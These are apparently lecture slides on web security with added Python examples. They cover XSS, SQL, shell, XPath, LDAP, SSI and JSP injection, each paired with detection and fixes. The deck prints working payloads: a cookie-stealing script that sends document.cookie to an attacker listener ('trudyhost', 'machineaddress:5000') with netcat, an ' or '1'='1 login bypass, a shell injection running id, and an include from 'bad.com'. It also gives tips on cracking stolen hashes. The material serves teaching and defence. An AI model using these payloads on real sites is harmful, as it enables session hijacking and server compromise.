web security. objectives understand the complexity of web infrastructure and current trends of web...

Upload: neil-wilson

Post on 13-Dec-2015

Page 1: Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure

Web Security

Page 2: Objectives

Understand the complexity of Web infrastructure and current trends in Web threats

Understand the mechanisms and defenses of major Web attacks: XSS, SQL injection and shell attacks

Page 3: Why Web Security: a Real Business Problem

> 60% of total attack attempts observed on the Net are against Web applications

> 80% of vulnerabilities discovered are in Web apps

Independent security audit

Regulatory compliance

Page 4: Auditor Finding

Freeform edit box
– Message to Customer Service

XSS issue raised

Must provide a response:
– Prove the issue to be a non-problem, or
– Describe the actions to take

Page 5: Anatomy of Web Attacks

1. Attacker breaks into a legitimate website and posts malware
• Malware is no longer exclusive to malicious Web sites.

2. Attacking end-user machines.
• Malware on a Web site makes its way down onto a user's machine when that user visits the host Web site.
• "Drive-by download": happens automatically with no user interaction required.
• Additional techniques do require some input from the user, but in practice are equally, if not more, effective.

3. Leveraging end-user machines for malicious activity.

Page 6: Anatomy of Web Attacks

(Figure) Source: Web Based Attacks, Symantec 2009

Page 7: Web Applications

Big trend: software as a (Web-based) service
– Online banking, shopping, government, etc.
– Cloud computing

Applications hosted on Web servers
– Written in a mixture of PHP, Java, Perl, Python, C, ASP

Security is rarely the main concern
– Poorly written scripts with inadequate input validation
– Sensitive data stored in world-readable files

Page 8: Typical Web Application Design

Runs on a Web server or application server

Takes input from Web users (via the Web server)

Interacts with back-end databases and third parties

Prepares and outputs results for users (via the Web server)
– Dynamically generated HTML pages
– Contain content from many different sources, often including regular users
  Blogs, social networks, photo-sharing websites…
  Web advertisements, usually third party
– A webpage can have content coming from 10-20 different domains

Page 9: Two Sides of Web Security

Web browser (front end)
– Can be attacked by any website it visits
– Attacks lead to malware installation (keyloggers, botnets), document theft, loss of private data

Web application (back end)
– Runs at the website
  Banks, online merchants, blogs, Google Apps, etc.
– Written in JavaScript, PHP, ASP, JSP, Ruby, …
– Many potential bugs: XSS, SQL injection, XSRF
– Attacks lead to stolen credit cards, defaced sites, etc.

Page 10: Chicago Tribune Home Page (screenshot)

Page 11: How Are Legitimate Web Sites Compromised?

SQL injection attacks

Cross-site scripting (XSS) attacks

Vulnerabilities in the Web server or forum hosting software (e.g., shell attacks)

Malicious advertisements
– Many Web sites today display advertisements hosted by third-party advertising sites
– The volume of ads published automatically makes detection difficult
– Their random appearance further compounds the detection problem

Search engine result redirection

Attacks on the backend virtual hosting companies

Page 12:

Page 13: JavaScript

Language executed by the browser
– Scripts are embedded in Web pages
– Can run before the HTML is loaded, before the page is viewed, while it is being viewed or when leaving the page

Used to implement "active" web pages
– AJAX, huge number of Web-based applications

Many security and correctness issues
– Attacker gets to execute some code on the user's machine
– Often used to exploit other vulnerabilities

Page 14: Cross Site Scripting

Attacker goal: get their code into the victim's browser

XSS forces a website visitor to execute malicious code in his/her browser

Accounts for roughly 80% of all documented security vulnerabilities

Page 15: XSS Risks

XSS abuses rendering engines or plug-ins

Steal browser cookies

Steal session info for a replay attack

Malware or bot installation

Redirect or phishing attempt

Page 16: XSS Example 1

Trudy posts the following JavaScript on a message board:

<script language="javascript">
var url = "http://machineaddress:5000/index.html?cookie=" + encodeURI(document.cookie);
new Image().src = url;   // the request for this "image" carries the cookie to the listener
</script>

Then run a TCP server listening on port 5000 with e.g., nc -l 5000

When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy

Page 17: Web Attack Demo Flow Chart (figure)

Page 18: XSS Demo Instructions

Set up a port forward to bypass the firewall:

ssh -L 9000:netsec-demos:2000 [email protected]

Note: 9000 is the local port; it is forwarded to netsec-demos port 2000 through the hamsa proxy

Use http://localhost:9000 to access http://netsec-demos.cs.northwestern.edu:2000

Page 19: XSS Demo Instructions (II)

Login as ychen and post the script with a sexy title (e.g., hot game!)

<script language="javascript">
var url = "http://netsec.cs.northwestern.edu:5000/index.html?cookie=";
url = url + encodeURI(document.cookie);
new Image().src = url;
</script>

Hi Everyone! Thanks for your cookies!

Ssh to that machine (e.g., netsec.cs.northwestern.edu) and run

nc -l -p 5000

(Whether the listener is started with -l -p 5000 or just -l 5000 depends on which netcat variant is installed.)

Page 20: Simple XSS Code

var url = "http://machineaddress:5000/index.html?cookie=" + encodeURI(document.cookie);

document.cookie is the browser's entire cookie string for the current website (cookies flagged HttpOnly are not included in it)

encodeURI() is a JavaScript function that hex-encodes (percent-encodes) certain characters so they can be included as part of a URL
– E.g., changing the space character to %20
– Makes the URL less suspicious

Page 21: What can Trudy Do with the Cookie?

Another user, test458, logs in; when he clicks the post, his cookie is sent to the attacker

Crack Bob's password (MD5 hash in the cookie) offline with John the Ripper or any other hash cracker (Hydra, also listed on the original slide, brute-forces live logins rather than hashes)
– For more info, http://netsec.cs.northwestern.edu/resources/password-cracking/

Use a Firefox plugin like TamperData to reset your cookies to impersonate Bob

Page 22: XSS Detection

A client usually is not supposed to send scripts to servers

If the server receives <SCRIPT>… or its hex (percent-encoded) equivalent in an incoming packet, and that same script is sent unsanitized in an outgoing packet, then an attack has occurred
– A sanitized script could look like &lt;SCRIPT&gt;…

Any user input must be preprocessed (HTML-encoded) before it is used inside HTML
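As an added example that is not part of the original slides, the Python below puts the rule on this page next to the cookie-stealing post from Page 16: a message-board renderer that pastes the post into the page as-is, the hardened renderer that HTML-encodes it first, and a server-side check that flags a request whose <script> (plain or percent-encoded, including double-encoded) reappears unsanitized in the response. The page template, the post and the function names are constructed for this example; the attacker host is the slide's own placeholder.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample post: the payload from Page 16 with the slide's placeholder host.
STORED_PAYLOAD = (
    '<script language="javascript">'
    'var url = "http://machineaddress:5000/index.html?cookie=" + encodeURI(document.cookie);'
    'new Image().src = url;'
    '</script>'
)

# Constructed page template; {body} is where a user's post lands.
PAGE_TEMPLATE = (
    '<html><body><h1>Message board</h1>'
    '<div class="post">{body}</div>'
    '</body></html>'
)


def render_post_vulnerable(body: str) -> str:
    """Interpolates the post verbatim: a <script> in the post becomes part of the
    page and runs in every reader's browser (stored XSS)."""
    return PAGE_TEMPLATE.format(body=body)


def render_post_safe(body: str) -> str:
    """HTML-encodes the post before it is placed inside HTML, so < > & " ' are
    displayed as text instead of being parsed as markup."""
    return PAGE_TEMPLATE.format(body=html.escape(body, quote=True))


# "<script" with optional whitespace, any case: <SCRIPT>, < script src=...
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def normalize_input(raw: str) -> str:
    """Undo the hex encoding used to make a URL look harmless (%3Cscript%3E ->
    <script>), repeating until stable so double encoding does not slip through."""
    prev, cur = None, raw
    while cur != prev:
        prev, cur = cur, unquote(cur)
    return cur


def looks_like_script_input(raw: str) -> bool:
    """A client is not supposed to send scripts to the server."""
    return SCRIPT_TAG.search(normalize_input(raw)) is not None


def reflected_unsanitized(request_field: str, response_body: str) -> bool:
    """The slide's rule: <script> arrived in the request and the same script left
    in the response without being encoded."""
    decoded = normalize_input(request_field)
    m = SCRIPT_TAG.search(decoded)
    if m is None:
        return False
    return decoded[m.start():] in response_body


def audit_post(body: str, renderer) -> dict:
    """Runs one post through a renderer and reports what a server-side monitor sees."""
    page = renderer(body)
    return {
        "script_in_input": looks_like_script_input(body),
        "attack_detected": reflected_unsanitized(body, page),
        "script_tag_in_page": SCRIPT_TAG.search(page) is not None,
    }


if __name__ == "__main__":
    for name, renderer in (("vulnerable", render_post_vulnerable), ("safe", render_post_safe)):
        print(name, audit_post(STORED_PAYLOAD, renderer))
```

Encoding on output stops the script from running but does not stop the post from being stored; the detection rule is what tells you someone tried. Separately, marking the session cookie HttpOnly keeps document.cookie from exposing it, which blunts this particular exfiltration but does nothing about the injected script itself.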

Page 23: SQL Injection

Malicious SQL statements run on the database and thus attack the server
– XSS, by contrast, can only target other users

Page 24: SQL Injection Example

Trudy accesses Bob's website, in which he does not validate input on his sign-in form
– It runs a SQL statement like the following:

select username, user_password from minibbtable_users where user_password = md5('johnspassword') and username='johndoe';

Set username to ' or '1'='1

select username, user_password from minibbtable_users where user_password = md5('anyrandompassword') and username='' or '1'='1';

Effect: picks any row where the username is blank and the password matches, or, because AND binds tighter than OR and '1'='1' is always true, every row in the table.

Add "limit 1" to pick the first row

Page 25: SQL Injection Detection

Input validation on any outgoing SQL statements from the web server to the database server
– Filter apostrophes, semicolons, percent symbols, hyphens, underscores, …
– Any character that has a special meaning must be escaped, e.g., convert ' into \'
  Only works for string inputs
  Different databases have different rules for escaping
– Check the data type (e.g., make sure it's an integer)
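As an added example that is not part of the original slides, here is the sign-in query of Page 24 built three ways in Python against an in-memory SQLite stand-in for minibbtable_users (rows constructed here): by string concatenation as the vulnerable form does, with quote-escaping as this page suggests, and as a parameterized query, which is what a practitioner reaches for first because the input is bound as data and never parsed as SQL. Two deviations from the slide, both forced by SQLite: md5() is computed in Python because SQLite has no md5() function, and SQLite escapes a quote by doubling it rather than with a backslash, which is exactly the "different databases, different rules" caveat. The integer check at the end is for the non-string case escaping cannot cover.

```python
import hashlib
import re
import sqlite3


def md5_hex(s: str) -> str:
    # The slide's md5('password'), computed here because SQLite has no md5().
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for MiniBB's user table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table minibbtable_users (username text, user_password text)")
    conn.executemany(
        "insert into minibbtable_users values (?, ?)",
        [("johndoe", md5_hex("johnspassword")),
         ("ychen", md5_hex("correct horse")),
         ("test458", md5_hex("hunter2"))],
    )
    return conn


def login_vulnerable(conn, username: str, password: str) -> list:
    """Pastes the raw form fields into the SQL text, as the slide's sign-in form does."""
    sql = ("select username from minibbtable_users "
           f"where user_password = '{md5_hex(password)}' and username = '{username}'")
    return [row[0] for row in conn.execute(sql)]


def escape_sqlite(s: str) -> str:
    """SQLite / standard SQL string literal rule: ' becomes ''. The slide's \\' is
    MySQL's rule; escaping is database-specific."""
    return s.replace("'", "''")


def login_escaped(conn, username: str, password: str) -> list:
    """Same concatenation, but quotes in the input are escaped first.
    Stops this payload, but only helps for string fields."""
    sql = ("select username from minibbtable_users "
           f"where user_password = '{md5_hex(password)}' "
           f"and username = '{escape_sqlite(username)}'")
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, username: str, password: str) -> list:
    """Placeholders: the driver passes the inputs separately from the SQL text,
    so no input can change the statement's structure."""
    sql = ("select username from minibbtable_users "
           "where user_password = ? and username = ?")
    return [row[0] for row in conn.execute(sql, (md5_hex(password), username))]


def parse_user_id(raw: str) -> int:
    """Type check for a non-string field: must be a plain decimal integer, so
    something like '1 or 1=1' never reaches the query."""
    if not re.fullmatch(r"[0-9]{1,9}", raw):
        raise ValueError(f"not an integer id: {raw!r}")
    return int(raw)


if __name__ == "__main__":
    conn = build_db()
    payload = "' or '1'='1"
    print("vulnerable:", login_vulnerable(conn, payload, "anyrandompassword"))
    # One way to realise the slide's "add limit 1": close the quote and comment out the rest.
    print("limit 1:", login_vulnerable(conn, payload + "' limit 1 -- ", "anyrandompassword"))
    print("escaped:", login_escaped(conn, payload, "anyrandompassword"))
    print("parameterized:", login_parameterized(conn, payload, "anyrandompassword"))
    print("legitimate:", login_parameterized(conn, "johndoe", "johnspassword"))
```

The vulnerable form returns every user for the slide's payload; the escaped and parameterized forms return nothing, and the parameterized one still accepts the real credentials.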

Page 26: Shell Attacks

Control an actual machine, such as a web server

Page 27: Shell Attacks

Inject commands into scripts that use Linux utilities
– E.g., with ";" as the command separator in UNIX/Linux

CGI programs (e.g., in Perl) can call command-line programs (e.g., grep, ls)

Unsanitized input passed as arguments can lead to command execution.

Page 28: Shell Attacks Demo

The search engine in the MiniBB webserver executes

system("echo $user_usr " . $phrase . " >>/tmp/searchlogs");

Put phrase as: >/dev/null; id; echo randomdata
– The original echo of the user name is redirected to /dev/null (hides the user ID) and id runs under the web server's account
– Stores random data in the logs to evade detection
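As an added example that is not from the original slides or from MiniBB, the Python below reproduces the search logger above as a shell-invoked command line and feeds it the slide's phrase, then shows two hardened forms that never hand the phrase to a shell, plus an allowlist check on the phrase. The log is a temporary file instead of /tmp/searchlogs and the user name is constructed; the command line itself follows the slide's system() call.

```python
import os
import re
import subprocess
import tempfile

# The phrase from the slide: redirects the legitimate echo to /dev/null, runs id,
# then appends harmless-looking data to the log.
PAYLOAD = ">/dev/null; id; echo randomdata"


def log_search_vulnerable(user: str, phrase: str, log_path: str) -> None:
    """Mirror of system("echo $user_usr " . $phrase . " >>/tmp/searchlogs"): the
    phrase is pasted into a line that /bin/sh parses, so ';' and '>' are operators."""
    cmd = f"echo {user} {phrase} >>{log_path}"
    subprocess.run(cmd, shell=True, check=False,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)


def log_search_safe(user: str, phrase: str, log_path: str) -> None:
    """Same log line without a shell: the program appends it itself, so
    metacharacters in the phrase are just bytes in the log."""
    with open(log_path, "a", encoding="utf-8") as log:
        log.write(f"{user} {phrase}\n")


def log_search_argv(user: str, phrase: str, log_path: str) -> None:
    """If an external program really is needed: argv list, no shell, redirection
    done by the caller. echo receives the phrase as one literal argument."""
    with open(log_path, "a", encoding="utf-8") as log:
        subprocess.run(["echo", user, phrase], stdout=log, check=False)


# Allowlist for a search phrase: letters, digits, space and a few punctuation marks.
PHRASE_OK = re.compile(r"[A-Za-z0-9 _.\-!?]{1,64}")


def phrase_is_allowed(phrase: str) -> bool:
    return PHRASE_OK.fullmatch(phrase) is not None


def run_logger(logger) -> list:
    """Runs one logger on the payload against a scratch log and returns the log lines."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "searchlogs")
        logger("ychen", PAYLOAD, path)
        if not os.path.exists(path):
            return []
        with open(path, encoding="utf-8") as f:
            return [line.rstrip("\n") for line in f]


if __name__ == "__main__":
    print("vulnerable:", run_logger(log_search_vulnerable))
    print("safe:", run_logger(log_search_safe))
    print("argv:", run_logger(log_search_argv))
    print("phrase allowed:", phrase_is_allowed(PAYLOAD))
```

With the shell in the loop the log ends up holding only "randomdata": the user name went to /dev/null and id ran in between. Without the shell the whole phrase, operators included, is recorded as text and nothing executes.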

Page 29: Discussion of Symantec White Papers: GETTING ONTO A USER'S COMPUTER (AUTOMATICALLY)

Page 30: GETTING ONTO A USER'S COMPUTER

(Figure) Source: Web Based Attacks, Symantec 2009

Page 31: Drive-by Download Attacks

Deliver malware from websites to a user's computer.

Exposure
– Browsing a website
– No user interaction is required
– Executable content is automatically downloaded

Page 32: "Click Jacking"

Page 33: GETTING ONTO A USER'S COMPUTER (WITH A LITTLE HELP FROM THE USER)

Page 34: Social Engineering

(Figure) Source: Web Based Attacks, Symantec 2009

• People are tricked into performing actions they would not otherwise want to perform

Page 35: Types of Social Engineering Attacks

Fake codec

Malicious peer-to-peer (P2P) files

Malicious advertisements

Fake scanner Web page

Blog spam

Other attack vectors
– Spam
– Pirated software

Page 36: Fake Codec

User is prompted to install a missing codec

Codec is actually malware code
– Usually a trojan horse

Page 37: Malicious Peer-to-Peer (P2P) Files

Malware authors bind content into popular applications
– Files named after celebrities, popular bands
– Uploaded to popular P2P sites where they are downloaded by unsuspecting users

Openly available how-to materials on the internet
– Detail how to build and distribute malware
– Pay-per-install malware

Page 38: Fake Scanner Web Page

Create a web site or product that misrepresents the truth
– JavaScript pop-ups notifying of a false need to install operating system updates
– Tools that claim to scan for and remove adult images, etc.

(Figure) Source: Web Based Attacks, Symantec 2009

Page 39: Blog Spam

Alluring links posted on blogs
– Links embedded in blog comments
– Direct users to sites that leverage social engineering tricks or browser exploits to spread malware

Page 40: Other Attack Vectors

Spam
– Emails contain links directing people to drive-by download, fake scanner/codec, and malware sites

Pirated software sites
– Pirated versions of software are bundled with, or comprised solely of, trojan horses

Page 41: How to Protect Yourself (Client side)

Update and patch software
– Get the latest OS, browser and application patches
– Browser plug-in updates are often forgotten

Endpoint protection software
– Anti-virus software for signature-based detection and behavioral monitoring
– Keep the protection software subscription updated
  Could miss 70,000 new unique virus variants in one week

Be suspicious
– Avoid things that seem too good to be true

Adopt a strong password policy

Page 42: Web Reputation Systems (ISP/Enterprise side)

The Web Reputation Agent (agent) first checks the blacklist/whitelist database deployed locally.

If the URL is in the database, the agent allows/rejects the URL request DIRECTLY.

Otherwise, the agent sends the URL to the Intelligent Cloud Network for deeper detection.

(Figure: Web Reputation Agent, Local Blacklist/Whitelist Database, Web Reputation System in Intelligent Cloud Network)

Page 43: Summary

Complexity of Web infrastructure and current trends in Web threats

Mechanisms and defenses of major Web attacks
– XSS
– SQL injection
– Shell attacks

New Web attack trends in the Symantec white paper

Page 44: Backup Slides

Page 45: Defense Approaches

Web firewall/IDS
– ModSecurity for Apache
– Commercial: SecureSphere from Imperva

Vulnerability scanners (the tools listed probe the running site, i.e. dynamic rather than static analysis)
– Open source: Nikto
– Commercial: Acunetix Web Vulnerability Scanner, N-Stalker

Education on good coding
– HTML encoding of user input wherever it is written into output (server-side)
– Input validation/filtering

Page 46: Existing Systems Comparison

System              | Content-based/URL-based | Dynamic/Static | Training Set           | Input | Output
IronPort            | Both                    | Mixed          | URLs from 100,000 Orgs | URL   | Malware, Phishing, and Spam
Safe Browsing       | Content-based           | Dynamic        | N/A                    | URL   | Malware and Phishing
Web of Trust        | URL-based               | Static         | User Comments          | URL   | Malware, Phishing, and Spam
Trend Micro Web Rep | Both                    | Mixed          | Not Public             | URL   | Malware, Phishing, and Spam
McAfee              | Both                    | Mixed          | Not Public             | URL   | Malware, Phishing, and Spam

Page 47: Intelligent Cloud Network

(Figure: Web Reputation Agent → Crowd Sourcing Engine, URL Classification Engine, Phishing Detection Engine, Webpage Static Detection Engine → Result Processing Center → Web Sandbox (dynamically executing web pages))

The Web Reputation Agent passes URLs to four fast detection engines: Crowd Sourcing, URL Classification, Phishing Detection and Webpage Static Detection.

These four engines are lightweight and therefore detect very fast. They return their scores to the Result Processing Center (RPC), which standardizes the four scores and generates a final score.

If the final score strongly indicates that the URL is legitimate or malicious, the RPC returns the score to the Web Reputation Agent. Otherwise, the RPC passes the URL to the Web Sandbox, a heavyweight detection engine that classifies the URL by executing the content fetched from it.
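As an added example that is not from the original slides or from any vendor's product, the Python below wires together the flow of Pages 42 and 47: a local allow/deny lookup, four lightweight engines whose raw scores come on different scales, a result-processing step that standardizes them onto 0..1, combines them and applies two thresholds, and escalation to a sandbox only for the undecided band. The engines, their score ranges and weights, the local lists, the crowd-report table, the thresholds, the sample page and the sandbox (which only unpacks unescape() strings rather than executing anything) are all constructed stand-ins.

```python
import re
from urllib.parse import urlsplit, unquote

# ---- Constructed data ---------------------------------------------------------
LOCAL_BLACKLIST = {"malware.example"}            # Page 42: local deny list
LOCAL_WHITELIST = {"bank.example"}               # Page 42: local allow list
CROWD_REPORTS = {"free-codec.example": 4}        # malicious reports per host, 0..10
SUSPICIOUS_TOKENS = ("login", "verify", "update", "codec", "scanner", "free")
BRANDS = ("paypal", "ebay")
STATIC_MARKERS = ("eval(", "unescape(", "document.write", "<iframe", ".exe")
UNESCAPE_CALL = re.compile(r"""unescape\(\s*["']([^"']*)["']\s*\)""")
# Constructed page: static scan sees only an encoded blob; unpacked, it injects a script.
CODEC_PAGE = ('<script>document.write(unescape("%3Cscript src=%27'
              'http://malware.example/x.js%27%3E%3C/script%3E"))</script>')


def host_of(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


# ---- Four lightweight engines; each returns (raw, lo, hi) on its own scale ----
def crowd_sourcing_engine(url, page_html):
    return CROWD_REPORTS.get(host_of(url), 0), 0, 10


def url_classification_engine(url, page_html):
    """Lexical URL features, 0..100."""
    host, low = host_of(url), url.lower()
    score = 25 * sum(tok in low for tok in SUSPICIOUS_TOKENS)
    if len(url) > 75:
        score += 20
    if host.count(".") >= 3:
        score += 15
    if any(c.isdigit() for c in host):
        score += 10
    return min(score, 100), 0, 100


def phishing_detection_engine(url, page_html):
    """Brand name inside a host that is not the brand's own domain: 0 or 1."""
    host = host_of(url)
    return int(any(b in host and not host.endswith(f"{b}.com") for b in BRANDS)), 0, 1


def webpage_static_engine(url, page_html):
    """Counts tell-tale constructs in the fetched HTML without running it, 0..10."""
    hits = sum(page_html.lower().count(m) for m in STATIC_MARKERS)
    return min(3 * hits, 10), 0, 10


ENGINES = [(crowd_sourcing_engine, 1.0), (url_classification_engine, 1.0),
           (phishing_detection_engine, 2.0),  # constructed weight: phishing evidence counts double
           (webpage_static_engine, 1.0)]


def standardize(raw, lo, hi):
    """Map an engine's raw score onto the common 0..1 scale (1 = malicious)."""
    return (raw - lo) / (hi - lo)


def result_processing_center(url, page_html, low=0.2, high=0.45):
    """Standardizes the engine scores, combines them, and decides or defers."""
    total = weight_sum = 0.0
    for engine, weight in ENGINES:
        total += weight * standardize(*engine(url, page_html))
        weight_sum += weight
    final = round(total / weight_sum, 3)
    if final >= high:
        return "malicious", final
    if final <= low:
        return "legitimate", final
    return "undecided", final


def web_sandbox(page_html):
    """Stand-in for dynamic execution: unpacks unescape("...") the way the browser
    would and inspects what the page would actually inject."""
    for packed in UNESCAPE_CALL.findall(page_html):
        decoded = unquote(packed).lower()
        if "<script" in decoded or "<iframe" in decoded:
            return "malicious"
    return "legitimate"


def classify(url, page_html=""):
    """Page 42 flow: local lists first, then the cloud engines, then the sandbox."""
    host = host_of(url)
    if host in LOCAL_BLACKLIST:
        return "reject", "local blacklist", 1.0
    if host in LOCAL_WHITELIST:
        return "allow", "local whitelist", 0.0
    verdict, final = result_processing_center(url, page_html)
    source = "result processing center"
    if verdict == "undecided":
        verdict, source = web_sandbox(page_html), "web sandbox"
    return ("reject" if verdict == "malicious" else "allow"), source, final


if __name__ == "__main__":
    for url, page in [("http://malware.example/x.js", ""), ("https://bank.example/login", ""),
                      ("https://news.example/", "<p>Hello</p>"),
                      ("http://paypal.verify-account.example/login", ""),
                      ("http://free-codec.example/download", CODEC_PAGE)]:
        print(url, classify(url, page))
```

The fake-codec page is the case the two-stage design exists for: the lightweight engines land in the undecided band (0.3 here), so only that URL pays for the sandbox, which sees the unpacked script tag and rejects it; the phishing URL is rejected by the lightweight stage alone.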

Page 48: Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure

XSS Example 2XSS Example 2

Trudy sends Bob a link to the following URL, which takes him to a personalized page:

http://host/personalizedpage.php?username=<script>document.location='http://trudyhost/cgi-bin/stealcookie.cgi?'+document.cookie</script>

The page is returned with the malicious script embedded in it, and Bob's browser executes the script, sending his session cookie to Trudy.

The JavaScript is usually percent-encoded (hex escapes such as %3C for <) rather than sent as plain ASCII, which makes the URL look less suspicious; the server decodes the parameter before reflecting it, so the attack is unchanged.
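The reflection and the hex disguise from this slide, worked through as an added example (not code from the slides): the slide's plain URL and a percent-encoded copy are parsed the way the server would parse them, rendered both with the slide's vulnerable verbatim reflection and with contextual HTML encoding, and checked against a filter that matches on the literal `<script>` and one that decodes first. The render functions and scanner names are this example's inventions.

```python
"""Reflected XSS from the slide: decoding, vulnerable reflection, fixed reflection."""
import html
from urllib.parse import parse_qs, unquote, urlsplit

# The slide's payload, exactly as personalizedpage.php would reflect it.
PAYLOAD = ("<script>document.location='http://trudyhost/cgi-bin/stealcookie.cgi?'"
           "+document.cookie</script>")
# Constructed URLs: the slide's plain form and the same script percent-encoded ("hex").
PLAIN_URL = "http://host/personalizedpage.php?username=" + PAYLOAD
ENCODED_URL = ("http://host/personalizedpage.php?username=%3Cscript%3Edocument.location%3D"
               "%27http%3A%2F%2Ftrudyhost%2Fcgi-bin%2Fstealcookie.cgi%3F%27%2Bdocument.cookie"
               "%3C%2Fscript%3E")


def username_param(url):
    """What the server-side script receives.  Form decoding undoes the %XX escapes
    and also turns a bare '+' into a space, which is why attackers encode '+' as %2B."""
    return parse_qs(urlsplit(url).query).get("username", [""])[0]


def render_vulnerable(username):
    """Reflects the parameter verbatim into HTML, as the page on the slide does."""
    return f"<h1>Welcome, {username}</h1>"


def render_fixed(username):
    """Contextual output encoding for an HTML text node: < > & " ' become
    entities, so the browser displays the payload instead of executing it."""
    return f"<h1>Welcome, {html.escape(username, quote=True)}</h1>"


def naive_scanner_hit(url):
    """A filter matching the literal tag in the raw URL misses the encoded form."""
    return "<script" in url.lower()


def decoding_scanner_hit(url):
    """Percent-decode until stable (catches double encoding) before inspecting."""
    current = url
    for _ in range(3):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return "<script" in current.lower()
```

Output encoding is the fix that holds regardless of how the parameter was encoded on the wire, because it is applied to the decoded value at the point of reflection. Marking the session cookie HttpOnly keeps document.cookie from exposing it, which blunts this particular payload but not XSS in general.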

Page 49

XPATH Injection Example

Similar to SQL injection. Bob has a form that does not sanitize user-provided input before using it as part of an XPATH query:

– string(//user[name/text()='USER_NAME' and password/text()='USER_PASS']/account/text())

Trudy again can provide the following password to change the statement's logic:

– X' or 'x'='x
– The predicate is now true for every user, so the statement selects the first account in the document
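The slide's query, built unsafely and then safely, as an added example (not code from the slides). XPath 1.0 has no escape character inside string literals, so the fix is to quote each value as a literal, switching quote style or falling back to concat() when the value contains quotes; a second function avoids building XPath from input altogether. The user store, its contents and the function names are this example's assumptions.

```python
"""XPath injection from the slide, with the string-literal quoting that prevents it."""
import xml.etree.ElementTree as ET

# Constructed user store matching the slide's //user[name, password]/account layout.
USERS_XML = """<users>
  <user><name>admin</name><password>s3cret</password><account>ACC-0001</account></user>
  <user><name>bob</name><password>hunter2</password><account>ACC-0002</account></user>
</users>"""


def build_query_unsafe(user, password):
    """The slide's pattern: untrusted values spliced straight into the XPath text."""
    return ("string(//user[name/text()='" + user + "' and password/text()='"
            + password + "']/account/text())")


def xpath_literal(value):
    """Render value as an XPath 1.0 string literal.  XPath has no escape
    character, so a value containing both quote kinds is built with concat()."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join(f"'{p}'" for p in parts) + ")"


def build_query_safe(user, password):
    """Same query, but each value is quoted so it can only ever be compared as data."""
    return (f"string(//user[name/text()={xpath_literal(user)} and "
            f"password/text()={xpath_literal(password)}]/account/text())")


def lookup_account(user, password, xml_text=USERS_XML):
    """Alternative that builds no XPath from input at all: navigate the tree and
    compare in Python.  (Plaintext passwords only because the slide's store has them.)"""
    for node in ET.fromstring(xml_text).findall("user"):
        if node.findtext("name") == user and node.findtext("password") == password:
            return node.findtext("account")
    return None
```

With the unsafe builder the injected password yields the predicate `password/text()='X' or 'x'='x'`, which matches every user, and string() over that node-set returns the first user's account. With the safe builder the same input becomes a double-quoted literal that is merely compared against the stored password. Where the XPath library supports variable binding (lxml's `$name` parameters, for instance), that is preferable to string assembly entirely.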

Page 50

LDAP Injection Example

Server using LDAP for authentication
– The user name is initialized from unchecked user input and concatenated straight into the search filter:

filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry

An attacker can exploit this with LDAP special characters; the wildcard below turns the filter into (uid=*), a presence filter that matches every entry:

http://example/ldapsearch.asp?user=*

Page 51

LDAP Injection Detection

Detection is based on the presence of special LDAP characters
– The system monitors input for special characters
– It either scrubs incoming input or watches for unescaped values being passed to the directory (LDAP) server

The detection approach is black-box
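The filter from the LDAP Injection Example slide, built the slide's way and then with RFC 4515 value escaping, together with the metacharacter check the detection slide describes, as an added example (not code from the slides). It is written in Python rather than the slide's ASP; the function names are this example's, and the escaping table is the standard one from RFC 4515 (backslash, `*`, `(`, `)` and NUL become `\` plus two hex digits).

```python
"""LDAP filter construction from the slide, hardened with RFC 4515 escaping, plus
the black-box metacharacter detection the following slide describes."""
import re

# RFC 4515: these characters inside a filter value must be written as \ + two hex digits.
_FILTER_ESCAPES = str.maketrans({
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
})
LDAP_METACHARS = re.compile(r"[*()\\\x00]")


def escape_filter_value(value):
    """Escape a value that is about to be placed inside an LDAP search filter."""
    return value.translate(_FILTER_ESCAPES)


def build_uid_filter_unsafe(user_name):
    """The slide's pattern: filter = "(uid=" + userName + ")", no escaping."""
    return "(uid=" + user_name + ")"


def build_uid_filter(user_name):
    """Hardened form: the value can no longer introduce wildcards or new filter components."""
    return "(uid=" + escape_filter_value(user_name) + ")"


def flag_ldap_metachars(value):
    """Black-box detection: report the special LDAP characters present in raw input,
    so a monitor can scrub the input or alert before it reaches the directory server."""
    return sorted(set(LDAP_METACHARS.findall(value)))
```

Escaping is the fix; the metacharacter report is the monitoring signal. A legitimate user name rarely contains `*`, `(`, `)` or a backslash, so flagging them gives a low-noise alert, but note that a single `*` is enough to turn the slide's filter into a match-everything presence filter, which is why the escaped form `\2a` must be what reaches the server.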

Page 52

SSI Injection Example

Bob has his server configured to use Server-Side Includes

Trudy submits input with an SSI directive embedded in it:

<!--#INCLUDE VIRTUAL="/web.config"-->

If that input is stored in a page the SSI handler processes, the server evaluates the directive on the next request and inserts the included content into the normal page

Future legitimate users receive content containing whatever the injected directive pulled in

Page 53

JSP Injection Example

Similar to SSI injection. Bob has a portal server configured to use dynamic code for templates

Trudy passes input with an embedded <jsp:include "http://bad.com/1.jsp">

The malicious code is inserted into the webpage
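Both the SSI Injection Example and the JSP Injection Example describe an include directive smuggled in through user content and later evaluated by the server. The added example below (not code from the slides) parses user-supplied content for mod_include directives and `<jsp:include>` actions, returning the directive name and attributes so a filter can decide what to do, and shows the neutralization step: HTML-encoding the content before it is stored, so the SSI parser never sees `<!--#` and the JSP container never sees a tag. The regexes, the record format and the function names are this example's; the slide's own payloads are used as input.

```python
"""Detect and neutralize server-side include directives in user-supplied content."""
import html
import re

# <!--#name attr="value" ... -->  (mod_include syntax; directive names are case-insensitive)
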